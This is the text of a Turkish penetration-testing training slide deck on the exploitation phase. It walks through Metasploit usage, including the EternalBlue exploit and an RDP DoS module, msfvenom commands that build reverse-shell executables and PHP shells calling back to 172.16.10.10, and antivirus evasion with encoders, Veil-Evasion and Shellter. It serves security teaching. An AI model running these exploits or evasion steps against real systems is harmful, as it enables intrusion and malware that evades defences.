Practical White Hat Hacker Training - Vulnerability DetectionPRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPRISMA CSI
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi MetodolojileriPRISMA CSI
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?PRISMA CSI
 

More from PRISMA CSI (9)

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log Toplama
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information Gathering
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi Metodolojileri
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?
 

Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması

  • 1. www.prismacsi.com © All Rights Reserved. 1 Uygulamalı Beyaz Şapkalı Hacker Eğitimi Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
  • 2. www.prismacsi.com © All Rights Reserved. 2 Exploit Aşaması
  • 3. www.prismacsi.com © All Rights Reserved. 3 Exploit Aşaması Konuları • Exploit Nedir? • Exploit Çeşitleri • Local, remote ve 0day exploitler • Exploit Veritabanları • Örnek Exploit Senaryoları • Exploit Derleme ve Kullanım Senaryoları • Exploit Frameworkleri • Payload Kavramı • Metasploit Framework • Antivirüs Atlatma Yazılımları • Veil-Evasion • Shellter • Uygulamalar
  • 4. www.prismacsi.com © All Rights Reserved. 4 Temel Kavramlar • Exploit nedir? • Bir zafiyeti sömürmek amacıyla geliştirilmiş araçlara verilen isimdir. • Sömürü kodu olarak da adlandırılır. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • Payload nedir? • Exploit sonrası yapılması isteneni gerçekleştiren zararlı kod parçası
  • 5. www.prismacsi.com © All Rights Reserved. 5 Exploit Veritabanları • Exploitlerin toplu olarak bulunduğu veritabanlarıdır. Bu veritabanlarında keşfedilen yazılım ve servisler için exploit aranabilir. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
  • 6. www.prismacsi.com © All Rights Reserved. 6 Exploit Geliştirme Dilleri • Exploitler genelde hangi dillerde yazılıyor? • Python • C / C++ • Perl • PHP • Ruby • Framework ihtiyacı neden doğdu? • Metasploit Framework örneği
  • 7. www.prismacsi.com © All Rights Reserved. 7 Exploit Derleme / Kullanım – Uygulama
  • 8. www.prismacsi.com © All Rights Reserved. 8 Exploit Düzenleme • Exploitler her sistem üzerinde çalışmaz. • İşletim sistemi, işlemci mimarisi, sistem dili gibi farklı özelliklere göre parametreler değişebilir. • Bu durumda exploiti düzenlemek ve daha sonrasında çalıştırmak gerekir. • Denemeler için hedef sistemin birebir kopyası laboratuvar ortamında oluşturulabilir. • Tek bir saldırı hakkınız varmış gibi düşünün! • Sistem crash olursa her şey bitebilir.
  • 9. www.prismacsi.com © All Rights Reserved. 9 Exploit Örneği - Senaryo • Bir bankanın kredi hesaplama alanını düşünün! • Hesaplama nerede yapılıyor? ( Server? Client? ) • Senaryoda belirtilen isteği bir python scripti ile 1 dakika içinde binlerce kez yaparsak? • Basit bir DoS Exploiti J
  • 10. www.prismacsi.com © All Rights Reserved. 10 Exploit Frameworkler • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
  • 11. www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • Metasploit Framework • Kurulum • Temel komutlar • Auxiliary modülleri • Exploit kullanımı • Payload listesi ve Meterpreter kullanımı • Çıktı analizleri • Post Exploitation
  • 12. www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Açık kaynak geliştirilen bir yazılım. • Pro versiyonu da var fakat bize community yeterli olacaktır. • Exploitler • Payloadlar • Auxiliary modülleri • Encoderlar • Post exploitler
  • 13. www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework • Kurulum için aşağıdaki adresi ziyaret edebilirsiniz: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Güncelleme: • msfupdate
  • 14. www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework
  • 15. www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Başlangıç • msfconsole ile komut satırına inebilirsiniz. • db_status komutu ile veritabanının durumunu kontrol edebilirsiniz.
  • 16. www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework • Workspace kavramı • workspace komutu ile çalışma alanlarını listeleyin. • workspace -a prisma prisma çalışma alanını yaratın. • workspace prisma prisma çalışma alanına geçiş yapın. • workspace -d prisma prisma çalışma alanını silin.
  • 17. www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework
  • 18. www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework • Nessus, Nmap çıktıları ile çalışma Tarama yazılımlarının çıktılarını metasploit ile entegre bir şekilde kullanabilirsiniz. Bu Metasploit Framework’ün en güzel özelliklerinden birisidir. • db_import nmap.xml nmap çıktısını import edebilirsiniz. • db_import nessus-report.nessus nessus çıktısını import edebilirsiniz. • db_export -f xml /tmp/prisma.xml çalışma alanınızdaki verileri export edebilirsiniz.
  • 19. www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
  • 20. www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework
  • 21. www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Workspace içerisinde bulunan veriler: • hosts • services • creds • loots
  • 22. www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework • Hosts komutu • Db_nmap –sS –Pn –n 10.0.1.0/24 Komutu ile bir nmap taraması gerçekleştirebilirsiniz. Bu komutun çıktısı sonrası keşfedilen tüm IP adresleri hosts komutu ile görüntülenebilir olacaktır. • Komutun tüm işlevlerine hosts –h ile erişebilirsiniz. • hosts –R komutu ile adresleri RHOST parametresine atayabilirsiniz.
  • 23. www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework
  • 24. www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework • Services komutu • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Komutu ile bir nmap taraması gerçekleştirebilirsiniz. Bu komutun çıktısı sonrası tüm IP adresleri üzerinde bulunan portlar ve üstünde çalışan servisleri services komutu ile görüntüleyebilirsiniz. • Komutun tüm işlevlerine services –h ile erişebilirsiniz. • services –p 445 • services –S http • services –p 80 -R
  • 25. www.prismacsi.com © All Rights Reserved. 25 Metasploit Framework
  • 26. www.prismacsi.com © All Rights Reserved. 26 Metasploit Temel Komut Listesi • help • Yardım komutu • banner • Şekil fotoğraflar çekinebilmenize olanak sağlar J • info • Herhangi bir plugin için bilgi alabilirsiniz • info exploit/windows/smb/psexec • search • Arama komutu • search ms17-010
  • 27. www.prismacsi.com © All Rights Reserved. 27 Metasploit Temel Komut Listesi • use • Exploiti seçmemizi sağlar • use exploit/windows/smb/psexec • set • Exploit • info • Herhangi bir plugin için bilgi alabilirsiniz • info exploit/windows/smb/psexec • search • Arama komutu • search ms17-010
  • 28. www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Help
  • 29. www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Banner
  • 30. www.prismacsi.com © All Rights Reserved. 30 Metasploit Framework - Info
  • 31. www.prismacsi.com © All Rights Reserved. 31 Metasploit Temel Komut Listesi • set • Bir parametreye değer atamak için kullanılır. • set RHOST 10.0.1.5 • setg • Parametreye değer global olarak atanır. • unset • Parametredeki değer sıfırlanır. • show • Adı üstünde J • use • Bir plugini aktifleştirmek için kullanılır.
  • 32. www.prismacsi.com © All Rights Reserved. 32 Metasploit Temel Komut Listesi • run ve exploit • Bir plugini çalıştırmak istediğinizde kullanabilirsiniz. • load ve unload • Bir modülü aktifleştirmek ve pasifleştirmek için kullanabilirsiniz. • exit • Çıkış komutu
  • 33. www.prismacsi.com © All Rights Reserved. 33 Metasploit Show Komutu • show payloads • Payloadları listele • show targets • Bir plugin için atak yapmaya uygun işletim sistemlerini listele • show options • Bir plugin için ayar parametrelerini göster • show encoders • Encoderları listele
  • 34. www.prismacsi.com © All Rights Reserved. 34 Auxillary Modülleri ve Kullanımı • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
  • 35. www.prismacsi.com © All Rights Reserved. 35 Exploit Denemesi (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
  • 36. www.prismacsi.com © All Rights Reserved. 36 Payload Örnekleri • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
  • 37. www.prismacsi.com © All Rights Reserved. 37 Reverse/Bind Shell
  • 38. www.prismacsi.com © All Rights Reserved. 38 Session Yönetimi • exploit/multi/handler • Dinleyici olarak kullanabilirsiniz. • Dinleyicinin birden fazla hedeften bağlantı alabilmesi için jobs olarak çalıştırabilirsiniz. • jobs görevi için: • exploit –j • jobs komutu ile listeleme yapabilirsiniz.
  • 39. www.prismacsi.com © All Rights Reserved. 39 Session Yönetimi • sessions komutu ile elde edilmiş tüm oturumları kontrol edebilirsiniz. • sessions –l : listeleme • session –i 1 : 1. session ile etkileşime geç • sessions –K : tüm sessionları bitir • sessions –u : oturumu meterpreter oturumuna yükselt • kill : sessionı öldürmek için kullanılır. • background : sessionı arka plana alır ve metasploit konsola geri döner.
  • 40. www.prismacsi.com © All Rights Reserved. 40 Exploit Arama • Searchsploit
  • 41. www.prismacsi.com © All Rights Reserved. 41 Msfvenom nedir? • Hedef sistemde doğrudan atak yapılabilecek bir zafiyet olmayabilir. • Bu durumda farklı yollar ile sisteme sızmayı denemek gerekebilir. • Örneğin yaratılacak bir zararlı exe nin bir şekilde sisteme yüklemesi başarılı olur ve bu zararlı dosya çalıştırılabilirse sistem ele geçirilebilir. • Veya file upload zafiyeti yakaladığınız bir web uygulamasına php ile yazılmış zararlı shell yüklemek ve bu zararlı ile birlikte bir metasploit üzerine terminal bağlantısı almak isteyebilirsiniz. • İşte burada devreye msfvenom giriyor!
  • 42. www.prismacsi.com © All Rights Reserved. 42 Msfvenom Kullanımı • Msfvenom temel kullanım komutları • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
  • 43. www.prismacsi.com © All Rights Reserved. 43 Msfvenom AV Atlatma - Uygulamalar • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
  • 44. www.prismacsi.com © All Rights Reserved. 44 Msfvenom Yardım
  • 45. www.prismacsi.com © All Rights Reserved. 45 Msfvenom PHP Payload İçeriği
  • 46. www.prismacsi.com © All Rights Reserved. 46 Metasploit Ek Plugin Yükleme • https://github.com/darkoperator/Metasploit-Plugins
  • 47. www.prismacsi.com © All Rights Reserved. 47 Metasploit Özellik Ekleme • Dosyalar manuel olarak ~/.msf4/plugin/ altına yüklenir.
  • 48. www.prismacsi.com © All Rights Reserved. 48 Armitage Kullanımı • Metasploit Framework GUI • Çok daha hızlı aksiyon almak için kullanılıyor • Arayüzü sayesinde kullanımı console uygulamasına göre biraz daha kolay
  • 49. www.prismacsi.com © All Rights Reserved. 49 Armitage Kullanımı • Host ekleme
  • 50. www.prismacsi.com © All Rights Reserved. 50 Armitage Kullanımı • Host tarama
  • 51. www.prismacsi.com © All Rights Reserved. 51 Armitage Kullanımı • Tarama Sonucu
  • 52. www.prismacsi.com © All Rights Reserved. 52 Armitage Kullanımı • Atak vektörlerinin keşfi
  • 53. www.prismacsi.com © All Rights Reserved. 53 Armitage Kullanımı • Java_rmi_attack
  • 54. www.prismacsi.com © All Rights Reserved. 54 Armitage Kullanımı • Java_rmi_attack • Meterpreter oturumu
  • 55. www.prismacsi.com © All Rights Reserved. 55 Antivirüs Atlatma Araçları • Hedef sistemlerde bir antivirüs mekanizması bulunabilir. • Bu durumda saldırıları çok daha temkinli gerçekleştirmek gerekir. • Antivirüsleri atlatmak amacıyla geliştirilmiş araçlar bulunmaktadır. • Kullanılan Araçlar • Veil-Evasion • Shellter • Av0id • Msfvenom
  • 56. www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Kurulumu
  • 57. www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Seçimi
  • 58. www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Ayarları
  • 59. www.prismacsi.com © All Rights Reserved. 59 Veil-Evasion Payload Üretimi - DEMO
  • 60. www.prismacsi.com © All Rights Reserved. 60 Virustotal Taraması
  • 61. www.prismacsi.com © All Rights Reserved. 61 Shellter Kurulum
  • 62. www.prismacsi.com © All Rights Reserved. 62 Shellter Kullanımı – DEMO
  • 63. www.prismacsi.com © All Rights Reserved. 63 Virustotal Taraması
  • 64. www.prismacsi.com © All Rights Reserved. 64 UYGULAMALAR
  • 65. www.prismacsi.com © All Rights Reserved. 65 Sorular?